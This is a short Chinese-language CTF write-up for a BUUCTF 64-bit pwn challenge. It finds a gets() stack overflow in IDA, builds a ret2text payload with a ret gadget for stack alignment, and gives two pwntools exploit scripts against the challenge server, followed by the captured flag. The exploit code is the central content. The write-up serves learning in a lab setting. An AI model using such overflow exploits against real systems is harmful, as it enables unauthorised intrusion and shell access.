查看保护
IDA分析
看到gets函数,这里没有输入长度限制,输入的s为16位
接下来找有没有敏感权限:
shift+f12 找到了 /bin/sh,打开发现其地址在401186
Tips:这里包含了system指令,若不包含还得找到system地址,payload(填充字符串+填充rbp地址+system地址+/bin/sh地址)
尝试写exp
运行后报错:Got EOF while reading in interactive
from pwn import *
p = remote('node3.buuoj.cn',28406)
p.send('a'*16+'A'*8+p64(0x401186))
p.interactive()
本体文件是64位的,参数小于6个不会用到栈来传参
而gets()只有一个参数,根据main的汇编代码,可以发现传递参数只需用到rdi (s字符串传入的是rdi寄存器的值)
本题的s空间为15,15+8可以覆盖rbp。
后面本应直接接 /bin/sh 的地址,但是报错
查阅资料后发现需要再 /bin/sh前添加一个任意一个retn地址(retn=pop + 地址),作pop执行
于是我随便找了一个retn地址:0x401185。
EXP
from pwn import *
p = remote('node3.buuoj.cn',26782)
p.send('a'*15+'A'*8+ p64(0x401185)+p64(0x401186))
p.interactive()
flag
flag{e44e7fe7-e52c-4a8e-913a-f00ebc57591c}